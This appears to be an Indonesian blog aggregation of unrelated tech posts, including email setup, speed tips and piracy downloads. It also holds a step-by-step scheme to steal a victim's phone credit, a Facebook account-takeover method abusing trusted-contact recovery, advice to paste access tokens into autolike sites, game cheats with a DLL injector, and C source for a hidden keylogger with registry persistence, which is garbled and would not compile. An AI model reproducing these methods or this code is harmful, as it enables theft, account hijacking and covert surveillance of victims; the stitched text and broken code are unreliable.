Membuat Email Dengan Domain Sendiri (nama@domainmu.com)

Tentunya kita pingin dong punya email dengan nama domain kita sendiri, misal namamu@domainmu.com. Nha sekarang ini google menyediakan fasilitas untuk membuat email seperti itu dengan cara yang lumayan mudah. Tapi sayangnya saat ini fasilitas tersebut belum bisa digunakan untuk blog yg masih menggunakan domain blabla.blogspot.com. Fasilitas ini hanya untuk yang memiliki domain sendiri, misal domainmu.com , .net. .org . dan top level doamin lainnya. Makanya itu bagi yang pengen, cepetan beli domain, aku sarankan beli di dodoldomain.com, murah lho (promosi...he..he..). Trus yang pake domain "co.cc" bisa gak? aku bilang "bisa", tapi sekarang aku pingin bahas yang pake domain .com/.net/.org, dll dulu. bagi yang punya domain "co.cc" sabar dulu ya.
Ok mari kita mulai tutorialnya bagaimana cara membuat email sendiri.

1. Buka alamat ini : http://www.google.com/a/cpanel/domain/new
2. maka km akan langsung disuguhi form seperti ini:




3. Isikan nama domain kamu didalam form tersebut lalu klik tombol "Get Started"
4. Kemudian akan muncul fomr lagi untuk mengisikan data-data yang diperlukan, Kalo sudah diisi klik "Continue"
5. Setelah itu akan muncul menu2 seperti ini :



6. Klik pada link "Activate email".
7. Setelah itu akan muncul lagi halaman untuk "Setup Email Delivery" , itu untuk setting MX Record. Caranya yaitu dengan mengisikan MX Record km dengan data2 yang ada disana. Datanya seperti ini :

MX Server address Priority
ASPMX.L.GOOGLE.COM. 10
ALT1.ASPMX.L.GOOGLE.COM. 20
ALT2.ASPMX.L.GOOGLE.COM. 20
ASPMX2.GOOGLEMAIL.COM. 30
ASPMX3.GOOGLEMAIL.COM. 30
ASPMX4.GOOGLEMAIL.COM. 30
ASPMX5.GOOGLEMAIL.COM. 30


Bagi yang menggunakan DNS setting dari DNS park caranya yaitu : Klik domain kamu yg berada di "Domain list". Setelah itu pilihan "Type" pilih yg "MX". Pada kolom "Mail Domain" kosongi saja kolom tersebut. Pada kolom "Order" isikan data2 "Priority" diatas. Trus pada kolom "mail server" isikan dengan data "MX Server Address" diatas kemudian klik tombol "Update All". begitu terus sampai data diatas dimasukkan semua.

Bagi yang menggunakan DNS setting dari dodoldomain.com caranya : masuk ke menu "Domain-->LIst last 10", trus klik link "Managed DNS", kemudian klik tombol Manage DNS Record. Setelah itu klik tombol "MX Records" trus klik tombol "Add MX Record". Untuk kolom "Value" pilih yg bawah (yg "Type In A Fully Qualified Domain Name eg. abc.pqr.com.') . isikan data "MX Server address" di kolom tersebut. kemudian isikan data "Priority" dikolom "MX Priority". begitu terus sampai selesai semua data dimasukkan.
8. kalo sudah selesai klik tombol " I have completed these steps". Maka akan muncul page seperti ini lagi.



9. Sebenarnya sampai disini sudah bisa selesai, tp untuk membuka email km, km harus mengetikkan alamt URL seperti ini "http://mail.google.com/a/domainmu.com" . Nha klao misalnya km pingin menggantinya menjadi seperti : "http://mail.domainmu.com" maka ikuti lagi langkah berikut ini.

10. Klik link "Email" maka akan muncul halaman "Email setting"
11. Trus klik link "Change URL" , kemudian akan muncul halaman untuk "Change URL for email".
12. PIlih yg "custom" trus klik tombol "Continue".
13. Setelah itu km setting dulu DNS km, Tambahkan "CNAME Records" dan isikan "mail" di kolom "Hostname" dan isikan "ghs.google.com" dikolom http://naldoton.blogspot.com"Value"
14. Setelah itu klik tombol "I have complete these step"

Nha sekarang km sudah bisa memiliki email dengan nama doamin blogmu sendiri. Untuk setting2 lainnya pelajari sendiri ya. Udah capek nih.....

Sedot Pulsa

Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya

Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata. Postingan ini diambil dari forum hackcenter
Kalian Ikuti Cara Di Bawah ini :... 

1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,

2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),

3. lalu submit, setelah itu kamu login dan pilih remind me later,

4. lalu kamu plih invite friend no tujuan kamu isi “TP(spasi)no.kamu(spasi)jumlah
pulsa”( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,

( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi ) 
jangan Guna Kan Yang Enggak Sob² Gua Posting Karenana Banyak Yang mengeluh kehabisan Pulza Buat Cewe,,lAh Taua apalah

GTA San Andreas PC Full RIP

GTA San Andreas, salah satu game yang banyak di request di remo-xp, tapi berhubung saya baru dapat link nya sekarang, jadi baru bisa share sekarang deh, hehehe. Buat yang sudah request, silahkan langsung di cek,,

Screenshot GTA San Andreas :

GTA San Andreas
GTA San Andreas
GTA San Andreas
System Requirement :
  • Intel Pentium 4 or AMD Athlon XP processor
  • 384MB(+) of RAM
  • 16x DVD-ROM drive
  • 4.7 GB of free space for a full install
  • 128MB Video Card with DirectX 9 compatible drivers
  • DirectX 9 compatible Surround Sound Card
  • Game pad with twin axis analog controls (USB or Joystick Port)
  • Keyboard & Mouse
Cara install Game GTA San Andreas PC Full  RIP :
  1. Ekstrak file hasil download yang telah di pecah menjadi 7 bagian dengan winrar.
  2. Setelah ekstrak, anda akan menemukan file yang telah di pecah sebanyak 16 bagian (jika part 1 error/tidak ada, silahkan download di bawah (Part 1 Fix)), ekstrak kembali mulai dari part1.
  3. GTA San Andreas
  4. Selesai ekstrak anda akan mendapatkan folder "PC_GTA.SanAndreas -(rip)-(ToeD)", buka lalu cari setup.bat/etup.bat, lalu klik 2x.
  5. GTA San Andreas
  6. Biarkan proses nya hingga selesai, cukup lama, karena nanti total size foldernya jadi 4 Gb, yang tadinya cuma 600 Mban.
  7. Selesai, jalankan gamenya.
INFO : Link download dan game sudah saya uji coba, hasilnya berjalan dengan baik di windows 7.

Download GTA San Andreas PC Full RIP : (Mediafire)

Cara Hack Facebook Tanpa Menggunakan Software

Cara yang satu ini cukup sulit, susah dan perlu banyak waktu untuk bisa mencapai puncak dari cara ini. Tetapi tidak ada salahnya teman-teman mencoba. Pertama-tama yang teman-teman harus lakukan adalah mengetahui informasi tentang orang yang akan dihack facebooknya misalnya Email.

Adapun syarat-syarat yang harus teman-teman punuhi yaitu harus mempunyai 3 facebook atau lebih yang telah berteman dengan si korban. Ini berguna untuk mengirim kode yang berjumlah 3 buah kode ke 3 buah facebook tema-teman. Jika syarat-syarat telah dipenuhi, mari kita ke langkah selanjutnya.

Step by step.
1. Login facebook menggunakan email korban. Ketik sembarang password, maka akan terlihat halaman salah login.
2. Masukan sembarang kata sandi terus menerus sampai terlihat halaman di bawah ini. Klik ini saya.

3. Klik Atur ulang kata sandi.

4. Pada halaman ini, hilangkan tanda contreng di semua email korban dan klik Tidak punya akses ke sini lagi. Lihat.

5. Nah pada tahap ini, masukan email anda yang belum terdaftar di facebook. Ingat email yang belum terdaftar di facebook.

6. Lihat tulisan yang saya beri tanda merah. Di situ tertulis 3 syarat yang harus anda penuhi yaitu yang  pertaman Pilih 3 teman yang tepercaya, kedua Hubungi teman anda untuk mendapatkan kode keamanan dan yang ketiga Pulihkan Akun Anda.

 
Seperti yang telah saya jelaskan diatas bahwa anda harus mempunyai 3 facebook atau lebih yang telah berteman dengan korban untuk kode tersebut dikirim ke anda. Klik Lanjutkan.

7. Selanjutnya anda akan dibawa ke tahap kedua yaitu memilih tiga teman. Pilih 3 buah facebook anda yang telah berteman dengan si korban. ingat pilih 3 facebook anda.

8. Kode yang akan anda terima seperti ini.

9. Masukan kode yang telah dikirim ke facebook anda.
10. Yang terakhir yaitu Pulihkan Akun. Dan anda telah dapat masuk ke facebook korban.

* Cara ini juga dapat digunakan untuk mengembalikan account facebook yang dihack.

TRIK FACEBOOK RIBUAN JEMPOL SETAN UNTUK STATUS FACEBOOK

Langsung saja sebelum membahas caranya lihat dulu gambar screenshot status facebooku




Berikut langkah langkahnya :
LOGIN KE FACEBOOK
SETTING PRIVACI MENJADI PUBLIK
IJINKAN PELANGGAN
Klik link dibawah ini
https://www.facebook.com/about/subscribe/
BUATLAH STATUS DI BERANDA
SELANJUTNYA GO TO SITUS AUTOLIKE
POWERLIKE.NET
atau bisa juga ke
AUTOLIKE-MY
KLIK GET ACCESS TOKEN
Ikuti aplikasinya dan izinkan dan setelah dibawa ke halaman BERANDA FB,langsung buka address barnya dan copy kode token-nya yang berupa huruf seperti ini AAAAAAoiahxptpxxxZDZD
Setelah dicopy selanjutnya masuk lagi ke LINK AUTOLIKE diatas dan tempelkan kode tokennya di kotak kosong dan klik SUBMIT
Tunggu sampai muncul foto dan status anda dan klik tombol yang ada dibawah POWERLIKE
Setelah ada pemberitahuan SUKSES silahkan cek status di profil anda
Untuk mendapatkan jumlah jempol yang lebih banyak bisa di ulang ulang meng-klik tombol POWERLIKE-nya
Sebagai contoh silahkan lihat statusku dihttp://www.facebook.com/minacoodotcom
Sekian semoga bermanfaat
NB: MAAF BILA LINK AUTOLIKE EROR BILA DI KLIK BERARTI LAGI ADA PROBLEM DENGAN SERVERNYA KARENA SERING TERJADI MASALAH DENGAN SERVER SITUS TERSEBUT TERIMA KASIH

Cara Mempercepat Koneksi Internet yang Lambat

Anda mempunyai permasalahan dengan koneksi internet anda yang lelet? Nah, disini Tourworldinfo Community ingin berbagi pengalaman bagimana cara mempercepat modem internet, cara mempercepat akses internet dengan semua operator yang ada di Indonesia. Cara ini merupakan cara yang sering saya gunakan ketika saya ingin mengakses internet di dunia maya ini untuk blogging. Seperti apah cara ampuh mempercepat Internet dengan maksimal? Well, yuks kita bahas disini...


Cara Mempercepat Internet Dengan Trik Terbaru


Internet merupakan kebutuhan manusia yang sangat penting untuk mencari berbagai informasi pengetahuan maupun berita terbaru di dunia maya yang kaya akan manfaat internet tersebut. Tapi apa jadinya bila Internet anda keok atau super lemot? Nah untuk mengatasi hal tersebut memang sangat sulit dan susah apalagi bila sinyal didaerah jangkauan BTS anda sangat jauh atau tidak terjangkau khusus untuk para pemakai modem yang memanfaatkan layanan jasa operator yaitu lewat suatu sinyal.

Teknik Mempercepat koneksi Internet yang saya pakai merupakan teknik yang biasa dan memang sangat gampang di gunakan. Teknik cara memperceat internet yang saya pakai sebagai berikut.

Cara Mempercepat Koneksi Internet Menggunakan Modem

1. Siapkan Modem anda terlebih dahulu.
2. Cari lilitan kawat yang mengandung bahan alumunium atau sejenisnya. (bereksperimen sendiri ya)
3. Masukkan Liitan kawat tadi kedalam modem anda ke lubang untuk sinyal penguat/ anda bisa lilitkan di komponennya. (Silahkan Berekperimen sendiri)
4. Sesudah anda pasang kan kawat tadi udah nancap dan panjang keluar dari modem tuh. Sekarang anda tinggal bikin lilitan kawat tersebut menjadi dua bagian kanan dan kiri pada ujungnya. Bisa disambung lagi di ujungnya sehingga membentuk hurug "Y"../ Ngerti kan? Di coba ya!
5. cara ini bertujuan untuk mencari sinyal yang ada di sekitar, ibaratnya gitu loghhh...
6. Sesudah itu anda pergi ke counter hp, beli alat penguat sinyal yang di tempel.
7. Setelah anda mendapatkan alat penguat sinyal tempelan, lalu anda tempel di belakang body modem anda. Ini bertujuan untuk mempertahankan daya sinyal yang sudah didapat dengan menggunakan lilitan kawat tadi.

8.Lakukan langkah-langkah berikut :

* Klik kanan pada My computer

* Pilih Properties

* Lalu ke HARDWARE tab->Device manager

* Pilih Ports ->Communication Port(double click on it and Open)

* Lalu
Ke Port Setting dan buat beberapa perubahan:

* Pada “Bits per second” ganti menjadi 128000

* dan “Flow control” option ganti menjadi Hardware

* Apply dan lihat hasilnya.

9. Selesai. Silahkan anda coba dan lihat hasilnya! Download Now

Cara tersebut sudah saya peraktekkan dan hasilnya sangat signifikan untuk perubahan daya serap koneksi saya yang saya pakai untuk blogging. Mungkin cara ini sedikit aneh tapi ini cara baru yang saya terapkan. Anda bisa mencari cara lain di internet yang lebih gampang dari ini. Misalnya menggunakan panci, setting all in one dll.

Nah itulah dia tips seputar cara mempercepat koneksi internet dari N3Community. Semoga informasi Cara Mempercepat Internet Dengan Trik Terbaru tersebut bermanfaat buat anda yang membacanya sehingga dalam menggunakan Internet, koneksi anda bisa stabil.

Tips Nonton Youtube Tanpa Buffering (Lancar)

Step 1 : SpeedBit Video Accelerator

Karena SpeedBit Dijamin lebih cepat dibanding program ByWifi dan sudah saya buktikan.

Kita ngebut aja, langsung DONLOD Gan: http://download.speedbit.com/va32.exe
Kalo pake win 7 atau yg setelah nginstal bermasalah, buang yg lama trus instal yg beta: http://download.speedbit.com/va32beta.exe
Sumber link di atas: : http://www.videoaccelerator.com/download/

Nanti di masa depan, klo mau menghilangkan kotak gede speedbit (tanda dia sedang buffering) Caranya KLik kanan di kanan bawah yg icon speedbit, lalu pencet setting, lalu jangan centangin "show now accerlerating message".

Lalu, [WAJIB TAU gan] DAFTAR WEBSITE YG DIsupport ama ni program (supaya nonton videonya ga cuma dari youtube doang): http://www.videoaccelerator.com/support/videosites/

Step 2 : Install 2 Script


  • Lalu Lalu buka web ini http://userscripts.org/scripts/show/26062, dan pencet tombol install, nanti ada kotak, pencet tombol install lagi... Itu skrip Updater, supaya suatu saat klo ada update-an script Youtube Enhancer, dia nanti muncul peringatan di bagian atas firefoxmu, nanti kapan2 klo ada peringatan suruh update, tinggal klik update, nanti otomatis ke webnya, tinggal pencet install install. Gampang itu mah. ^^

  • Inti dari script youtube enhancer itu adalah membuat qualitas video jadi low, sehingga sangat cepat dibuffer, apalagi dibuffer pake speedBit. Terus ikutin yg ada di spoiler ini supaya setiap video yg di buka selalu otomatis jadi low quality (jadi tanpa pencet tombol modenya lagi, asik kan ^^):

Pertama buka dulu youtube, jalankan video apa aja, lalu pencet sesuai gambar dibawah:



Abis itu muncul ini, pilih TAB OTHERS lalu pilih CUSTOM di force fmt lalu isi angka 5, lalu save..



Btw, Bro and Sis, Ini Saya jelaskan dikit tentang Menu2 Youtube Enhancer (tombol2 dibawah video youtube) :



  • Ada angka 640, 960, dan lain2 itu untuk ngubah ukuran video...

  • Ada gambar tengkorak untuk menghentikan buffering. Ingat, kadang klo video blum selesai dibuffer mau pindah ke video lain di jendela yg sama, prosesnya jadi agak lama karena video tsb masih dibuffer ama speedbit, jadi harus pencet tombol tengkorak dulu, ok.

  • Ada juga tombol lampu supaya latar youtube jadi gelap....

Speedbit ga usa cari krack, soalnya fasilitas yg premium itu tidak dipakai.

Step 3 : DNS Google

Menggunakan DNS Google !!! Tujuan: Mempercepat ping youtube ke komputer kita (uda saya buktikan).
caranya: Buka control panel -> Network Connection -> Local area network (double click local area network yg connected) -> klik properties -> doble click tcp/ip -> klik use the following dns address -> masukin preferred: 8.8.8.8 -> masukin alternate: 8.8.4.4

Ada panduan gambar untuk yg bingung:



Step 4 : Youtube Feather


Menggunakan YOUTUBE "Feather" Beta (Mantap) !!! Tujuan: Mempercepat ping/LATENCY youtube ke komputer kita (uda saya buktikan, !!!).
caranya: Buka link ini: http://www.youtube.com/feather_beta lalu pencet: Join the "Feather" Beta !!!

Tapi ingat, kalo suatu saat juragan nge-clear cache firefox, youtube feather harus diaktifkan lagi !!

Step 5 : Virtual Memory & GpEdit

Virtual Memory: Coba tingkatkan virtual memory anda di klik kanan My computer -> properties -> di bagian performance pencet tombol settings -> masuk tab advanced -> pnct tombol change -> ganti initial sama maximum size jadi 3000 lalu pencet tombol set lalu ok-in.

Ada Panduan Gambar untuk Virtual Memory buat yg bingung:



GPEdit: [Wajib Coba KHUSUS WINDOWS XP, klo win 7 ato vista, coba aja, ok] Hapus bandwidth reserved windows untuk meningkatkan kecepatan Internet..

Langkah - langkah:
  • Klik Start - Run kemudian ketik gpedit.msc
  • Secara default anda akan dihadapkan pada group policy editor
  • Kemudian masuk ke Local Computer Policy
  • Computer Configuration lalu pilih Administrative Templates - Network - QOS Packet Scheduler - Limit Reservable Bandwidth
  • Pada limit reservable bandwidth klik 2 kali dan pilih enable, dan pada Bandwidth Limit % masukan angka 0 ( Kosong).
  • Close gpedit dan restart komputer anda. Selesai.. !!

Kalo misal yg di Administrative templates - network itu ga muncul, ini triknya:
coba start, run, ketik gpedit.msc lalu klik kanan pencet yg add/remove template, lalu jika ad file yg blum ter-add, addlah file2 dgn nama ini: conf, inetress, system, wmplayer, wuau. klo smua file ud masuk listnya, nah, ud muncul gan yg bagian networknya itu yg qos packet scheduler->limit reserve bandwidth, tingggal di doble klik+enable+kasih angka 0 lalu pencet ok. Lihat post ke #2 untuk step2 ngerubah gpedit yg lebi jelas...

Ada Panduan Gambar untuk yg GPEdit :



Step 6 : Restart Komputermu

Restart komputermu dulu supaya semuanya berjalan dgn baik !!

Internet Download Manager 7.11 beta build 4 Full + Keygen

sebenarnya sih kagak Internet Download Manager 7.11 hehe cuma mau nembak Keyword aja sih biar aja mumpung jadi penulis baru hiee hahah gakpapa kan naikin taraffic blog hehe yah . sebenarnya sih Internet Download Manger kembali mengeluarkan versi terbarunya yaitu Internet Download Manager 6.11 beta build 4. Bagi yang suka download pasti sudah tau dengan software Downloader yang satu ini. heeheh , Perkenalkan Ane Akhmad Ilham N Penulis Baru Blog ini ya heheh




Yang Baru dari Internet Download Manager 6.11 beta build 4 Yaitu :
  • Improved IDM categories. Added a feature to create categories for specific sites
  • Fixed bugs 

Download :
Download Patch | File Size : 200 KB |
Password :

Tutorial Lengkap Visual Basic Untuk Pemula dan Mahir


  Asalamualaikum Mas bro semua, Mulai saat ini N3Community akan mulai Men Share tentang Visual Basic dari Tutorial Pembuatan Program Visual Basic 6 sampai contoh Source Code Visual Basic lengkap akan saya coba share disini. Kenapa saya memilih Visual Basic khusus nya Visual Basic 6 untuk Pemrograman ??? ya karena Software ini menurut saya adalah software yang sangat baik sampai sekarang dan mudah di mengerti dan di pahami untuk di pelajari. memang banyak sekali bahasa memrograman yang lain mas bro seperti foxpro, delphi, java atau masih banyak yang lain yang bisa di pelajari , tapi ga tau kenapa saya sudah jatuh cinta dengan visual basic 6 ini mas bro. Menurut saya mas bro, bila kita ingin bisa menguasai pemrograman. serius lah dengan salah satu bahasa pemrograman saja. insya allah kita akan menguasainya. sama dengan idup . bila kita suka dan sayang dengan cewek kita harus serius dengan pacar kita satu orang saja, jangan nyabang2 , hahahaha. mang kayu nyabang.
Visual Basic adalah salah satu developments tools untuk membangun aplikasi dalam lingkungan windows mas bro. Dalam Pengembangan aplikasi, visual basic menggunakan pendekatan Visual untuk merancang user interface dalam bentuk form, sedangkan untuk coding nya menggunakan bahasa basic yang mudah di pahami, maka itu saya jatuh cinta dengan pemrograman ini mas bro.
Dalam lingkungan Windows's User interface sangat memegang peranan penting , karena dalam pemakaian aplikasi yang kita buat , pemakai senantiasa berinteraksi dengan user interface tanpa menyadari bahwa dibelakangnya berjalan instruksi perogram yang mendukung tampilan dan proses yang dilakukan.

Pada pemrograman Visual , pengembangan aplikasi di mulai dengan pembentukan user interface yang kemudian mengatur properti dari objek yang kita gunakan dalam user interface tersebut mas bro. dan baru dilakukan penulisan kode program yang menangani kejadian2 atau biasa di sebut even mas bro.
nah tahap pengembangan aplikasi inilah yang biasa dinamakan dengan istilah pengembangan aplikasi dengan pendekatan Bottom Up.

Perlu Mas bro perhatikan,., dalam dunia pemrograman menurut saya ,., Kekuatan basic atau pengetahuan basic kita dalam bahasa pemrograman tersebut yang di utamakan mas bro, baru tentang kreatifitas kita dalam memunculkan ide apa yang akan kita tampilkan, dan juga kita harus memakai logika untuk pemrograman tersebut mas bro. kata sikologi kalau laki2 selalu memanfaatkan logikanya untuk memutuskan sesuatu, demikian juga di visual basic mas bro menurut saya.

Ocre lah ga usah panjang lebar yang lebar biarrrr...??? hahahahahaha,., nah karena penjelasan dan tutorial nya lumayan panjang silahkan mas bro download Ebook Tutorial Visual Basic untuk pemula lengkap ini mas bro.
setelah mas bro sudah memahami basic nya baru mas bro baca -baca tentang tutorial lanjutan di blog sederhana ini lagi ya mas bro. saya akan bagikan tutorial dan Source Code vb 6 nanti. tentang Source Code Aplikasi, Source Code Game dan yang lain nya . Segini saja dulu , sampai jumpa lagi nanti dengan saya di Tutorial Visual Basic lanjutan selanjutnya .


Semoga Bermanfaat

Cara Efektif Belajar Deface Website Dengan Aplikasi Webgoat

Kalau kita mau deface pastinya menggunakan SQL Injection, XSS, LFI, RFI, LFD, tapi sebenarnya masih banyak teknik - teknik deface website ataupun hacking website.


Nah dengan aplikasi webgoat ini anda bisa belajar deface website dengan efektif karena anda belajar tanpa merusak punya orang. Nah dengan aplikasi webgoat juga anda akan diberitahu kelemahan - kelemahan dari website. Aplikasi Webgoat ini cara belajarnya menggunakan misi - misi yang nantinya anda harus selesaikan.
Webgoat ini juga menggunakan Apache Tomcat (Tidak ada juga tidak apa - apa kalau menggunakan webgoat terbaru).
Cara Efektif Belajar Deface Website 
Dengan Aplikasi Webgoat
Untuk mendownload aplikasi webgoat ini bisa dikunjungi di DISINI.
Berikut cara efektif belajar deface websige dengan aplikasi WebGoat :
  1. Kalau sudah di download webgoatnya maka ekstrak file webgoat lalu buka file webgoat.bat
  2. Buka dengan browser kesayangan anda ex: chrome dengan URL DISINI
  3. Isi username dan password guest
  4. Nah klik deh Start Webgoat
C id=
Itu dia kalau sudah masuk tinggal anda pilih saja menu - menu yang anda inginkan untuk belajar webgoat kalau nggak ngerti tinggal klik hintnya tapi pake bahasa inggris sih :P. Disarankan setelah menjalankan webgoat ini anda harus mematikan koneksi internet anda takut kalau orang lain buka bisa berabe :D.
Itu dia dengan aplikasi webgoat anda akan belajar secara efektif deface website dan kelemahan - kelemahan website.

DRMC V1 [Brust AWP & Global Brust ,AMO Jutaan + reload + Wallshot+WH + Full SET ESP + fullset repace + Headshot +1 hit Invis+Magneto super For Public!

Downloads Cheat
Tanpa Password
Simple Menu
[Direct]
  • WH Clean
  • Chams
  • No SMoke
  • X-hair
[Player Menu]
  • Auto HS
  • 1 hit
  • Move Speed \ Lari tuyul
  • Invisble Kill Time
  • Pas Bom 1 hit
  • Bintang 2 Akses/Skilled Tero& CT
  • Wallshot
  • Anti PI (Hot)
  • Magnote+greget Mode (Hot)
  • Rossi mode Active Mode = ON/Disable= off 
  • Ninja Mode Active Mode = ON/Disable= off
[Replace Menu]
  • Replace Piso
  • BOMB
  • ASAP
  • Pistol 
  • DeFF ++
  • Baret Full
[ESP]
  • ESP name
  • Box
  • Distance
  • Line
  • Healt
[ESP]
  • Brust Global Termasuk AWP kayu
  • Amo reload and no reload


Cara Penggunaan Greget Magneto
  1. On Kan Auto HS 
  2. Onkan Invisble
  3. On Kan Replace smoke - pilih WP smoke / jngan wp smoke ++
  4. On kan magneto
  5. Lepar bom asap ke tengah 
  6. Musuh akan ke kill dengan sndirinya
  7. Hepi Maskkil

Dalam 1 jam point bisa dapat 40.000 tested by me,,
kayak GB mode

 Penggunaan Cheat :
  1. Buka PB kamu,,
  2. Buka Cheat,,
  3. Start PB 
  4. Kalau lag , Keluar ja ,ALT KIRi+ALT kanan+TAB,
  5. Ntar di coba lagi langkah dari awal,,coz semua pb kalau pertama pasti lag,,tapi kalau ke dua dst nya ndak bakalan lag,,
Recomendation Windows Xp, WIndows 7 , Vizta

Created
N3Community
Andrie Danang Kurniawan (Tropper Bermasalah)

New Hack LS Weeekend FAST DELAY HACK For PUBLIC | not for sale! ( No Delay)


Downloads Cheat
Tanpa Password

Tutor penggunaan Cheat
1.Buka Injector/terserah pakai apa ja,, <sudah di sediakan Perx Injector>
2.Isikan "What The Inject:" dengan "lostsaga.exe" (tanpa kutip)
3.Browse... (Pilih dll)
4.Start Lostsaga


Insert = Fast The Delay Hack

Free Download Avast AntiVirus

ANTIVIRUS / ANTIMALWARE
Tidak perlu banyak penjelasan, kategori ini isinya link ke software antivirus / antimalware yg menawarkan free protection, termasuk software berbayar yg menawarkan free versionnya,,,
Semoga Bermanfaat
 

Cara Mempercepat Koneksi Di Mozilla Firefox



Nah saya akan bagikan artikel tentang cara  membuat Mozilla Firefok anda menjadi lebih cepat

Peralatan : Mozilla Firefox

Cara :
1.Buka Mozilla Firefox Terlebih Dahulu
2.Ketik Di Addres Bar " about:config " (Tanpa Tanda Petik)
3.Ketik " network.http.max-connections " Double Klik Dan Masukan Value " 64 "
4.Ketik " network.http.max-connections-per-server " Double Klik Dan Masukan Value " 21 "
5.Ketik " network.http.max-persistent-connections-per-server "Double Klik Dan Masukan Value " 8 "
6.Ketik " network.http.pipelining " Double Klik dan Menjadi " True "
7.Ketik " network.http.pipelining.maxrequests " Double Klik dan Masukan Value " 100 "
8.Ketik " network.http.proxy.pipeling " Double Klik Dan Menjadi " True "
Langkah Terakhir,Klik Kanan Dimana Saja Pilih : New > Integrar > Lalu Tulis " nglayout.initialpaint.delay " (Tanpa Tanda Petik) Kemudian Klik OK,Dan Masukan Value " 0 "

Silahkan Mencoba

Semoga Bermanfaat

Membuat FlashDisk menjadi Hardware Keylogger


Ini dia tutornya :

• Pertama agan harus menyediakan flash disk ato USB agan masing-masing (yang g jorok atau bebas virus ya, biar kompu orang g rusak).

• Lalu agan mesti download C++. Bias agan download di http://www.brothersoft.com/dev-c++-65296.html.

• Setelah anda donlod C++, anda buka dan install

• Setelah di install, open dan tulis code ini :



Code:

#include <windows.h>
#include <stdio.h>
#include <winuser.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();/*check if key is available for opening*/

    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\Log.exe";/*the path in which the file needs to be*/
        create=create_key(path);

    }


    int t=get_keys();

    return t;


int get_keys(void)
{
            short character;
              while(1)
{

    for(character=8;character<=222;character++)
{
    if(GetAsyncKeyState(character)==-32767)


     FILE *file;
    file=fopen("log.log","a+");
if(file==NULL)
{
return 1;
}           
if(file!=NULL)
{       
if((character>=39)&&(character<=64))
{
    fputc(character,file);
    fclose(file);
    break;
}       
    else if((character>64)&&(character<91))
{
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
}
    else
{
    switch(character)
{
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;   
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                           
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;   
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                               
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               /*case VK_OEM_PLUS:
                                               fputc('+',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_COMMA:
                                               fputc(',',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_MINUS:
                                               fputc('-',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_PERIOD:
                                               fputc('.',file);
                                               fclose(file);
                                               break;*/
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }       
                                   }   
                              }       
                    }   
                }                 

            }
            return EXIT_SUCCESS;                           
}                                               

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {   
        check=1;
        return check;
    }       

